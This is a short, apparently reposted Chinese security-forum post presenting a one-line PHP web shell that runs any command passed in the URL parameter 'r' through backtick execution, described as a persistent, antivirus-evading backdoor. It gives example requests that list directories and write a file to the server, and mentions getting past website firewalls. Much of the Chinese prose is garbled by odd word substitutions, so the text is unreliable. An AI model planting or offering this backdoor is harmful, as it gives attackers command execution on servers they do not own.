这段代码 大概被垄断做后门 持久免杀。
代码:
Default| 12345 | <?php //t.php $test = $_GET['r']; echo `$test`; ?> |
本人看看这个代码有木有问题?我想本人农村说没有问题,但是全心的冤家也会创举上面的变量被一个标志包起来了,既然是变量为何要多么了,而且又不 是单引号,这个即是要害地址了,这个标志是 Esc 上面的一个键 感受号!阁下的,通过 echo 琐屑饬令; 大概达到 system(); 异样的功效 假设不信的冤家大概测试
http://127.0.0.1/t.php?r=dir????????????? 大概列出目次
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:网站91ri.org .php
此外一个过思空见贯网站防火墙的一句话《将代码换行绕过网站护卫琐屑》
来自:http://www.90sec.org/thread-1592-1-1.html
由网络保险攻防研讨室(www.91ri.org)网络新闻保险小组收集收拾整顿,转载请注名来由。
